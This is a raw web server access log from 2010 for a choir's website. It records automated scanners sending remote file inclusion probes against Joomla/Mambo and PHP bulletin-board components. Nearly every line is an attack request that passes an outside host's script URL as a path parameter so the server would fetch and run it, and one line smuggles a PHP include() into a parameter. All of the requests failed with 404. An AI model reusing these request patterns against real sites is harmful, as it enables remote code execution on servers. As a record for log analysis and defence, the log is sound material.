87.106.132.3 - - [09/Mar/2010:08:34:07 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:34:16 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:34:24 -0800] "GET /logs/access_100112.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:34:27 -0800] "GET /logs/access_100112.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:34:35 -0800] "GET /logs/access_100112.log%20%20//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://horsetalkforums.co.uk/idx.txt???????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:35:23 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
221.141.1.113 - - [09/Mar/2010:08:35:51 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:35:58 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:36:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:36:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:36:17 -0800] "GET /logs/access_100214.log//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:36:17 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:36:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:36:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:36:19 -0800] "GET /logs/access_100116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:36:19 -0800] "GET /logs/access_100116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:36:32 -0800] "GET /logs/access_100109.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:36:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:36:34 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:36:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:36:39 -0800] "GET /logs/access_100109.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:36:41 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:36:46 -0800] "GET /logs/access_100116.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:36:46 -0800] "GET /logs/access_100131.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:36:59 -0800] "GET /logs/access_100112.log//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.55.148.208 - - [09/Mar/2010:08:37:01 -0800] "GET /logs/access_100116.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:37:11 -0800] "GET /logs/access_100131.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:39:36 -0800] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:39:36 -0800] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:39:36 -0800] "GET /logs/access_091111.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:39:47 -0800] "GET /logs/access_100209.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:40:13 -0800] "GET /logs/access_100112.log//com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:40:31 -0800] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:40:31 -0800] "GET /logs/access_091111.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:40:31 -0800] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:40:45 -0800] "GET /logs/access_100209.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:40:56 -0800] "GET /logs/access_100214.log//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:40:56 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:41:01 -0800] "GET /logs/access_100116.log/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:08:41:01 -0800] "GET /logs/access_100214.log/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:41:23 -0800] "GET /logs/access_091111.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:41:23 -0800] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:41:23 -0800] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:41:33 -0800] "GET /logs/access_100209.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:42:02 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:42:03 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:42:03 -0800] "GET /logs/access_100228.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:42:44 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:42:44 -0800] "GET /logs/access_100228.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.166.154 - - [09/Mar/2010:08:42:44 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:43:09 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:43:09 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:43:10 -0800] "GET /logs/access_091029.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:43:55 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:43:56 -0800] "GET /logs/access_091029.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:43:56 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.115.6.12 - - [09/Mar/2010:08:44:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:08:45:55 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:08:45:55 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:46:01 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:46:01 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:46:01 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:46:03 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:46:03 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:46:03 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:46:04 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:46:04 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:46:04 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:46:50 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:46:50 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:46:50 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:47:03 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:47:03 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:47:04 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:47:11 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:47:11 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:47:12 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:30 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:30 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:30 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:34 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:40 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:40 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:40 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:43 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:43 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:43 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:44 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:48:47 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:13 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:13 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:13 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:25 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:29 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:29 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:30 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:30 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:30 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:32 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:44 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:08:49:45 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:08:51:03 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:52:16 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:52:16 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:52:16 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.140.23.24 - - [09/Mar/2010:08:52:18 -0800] "GET /logs/access_091029.log///bbs//skin/zero_vote/ask_password.php?dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:52:21 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:52:21 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:52:21 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:52:22 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:52:22 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.179.177.167 - - [09/Mar/2010:08:52:22 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:08:52:36 -0800] "GET /logs/access_091213.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:08:52:36 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.47.237.17 - - [09/Mar/2010:08:52:37 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
